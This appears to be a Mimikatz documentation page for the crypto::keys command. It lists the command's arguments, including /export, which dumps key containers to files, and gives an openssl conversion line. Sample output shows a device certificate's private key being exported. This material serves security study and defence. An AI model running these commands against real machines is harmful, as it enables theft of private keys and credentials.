keys
crypto::keys lists or exports key containers. It has the following command line arguments:
  • /provider: the legacy CryptoAPI provider (default: MS_ENHANCED_PROV)
  • /providertype: the legacy CryptoAPI provider type (default: PROV_RSA_FULL)
  • /cngprovider: the CNG provider (default: Microsoft Software Key Storage Provider)
  • /export: export all keys to PVK files
  • /silent: if user interaction is required, then abort
If needed, you can convert PVK files with: openssl rsa -inform pvk -in key.pvk -outform pem -out key.pem
1
mimikatz # crypto::keys /export
2
* Store : 'user'
3
* Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
4
* Provider type : 'PROV_RSA_FULL' (1)
5
* CNG Provider : 'Microsoft Software Key Storage Provider'
6
โ€‹
7
CryptoAPI keys :
8
โ€‹
9
CNG keys :
10
0. Microsoft Connected Devices Platform device certificate
11
|Provider name : Microsoft Software Key Storage Provider
12
|Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ;
13
Key Container : Microsoft Connected Devices Platform device certificate
14
Unique name : de7cf8a7901d2ad13e5c67c29e5d1662_e4aad2d1-5ec0-4ea4-b259-65eda5bc47a8
15
Algorithm : ECDSA_P256
16
Key size : 256 (0x00000100)
17
Export policy : 00000003 ( NCRYPT_ALLOW_EXPORT_FLAG ; NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG ; )
18
Exportable key : YES
19
LSA isolation : NO
20
Private export : OK - 'user_cng_0_Microsoft Connected Devices Platform device certificate.dsa.ec.p8k'
Copied!
Copy link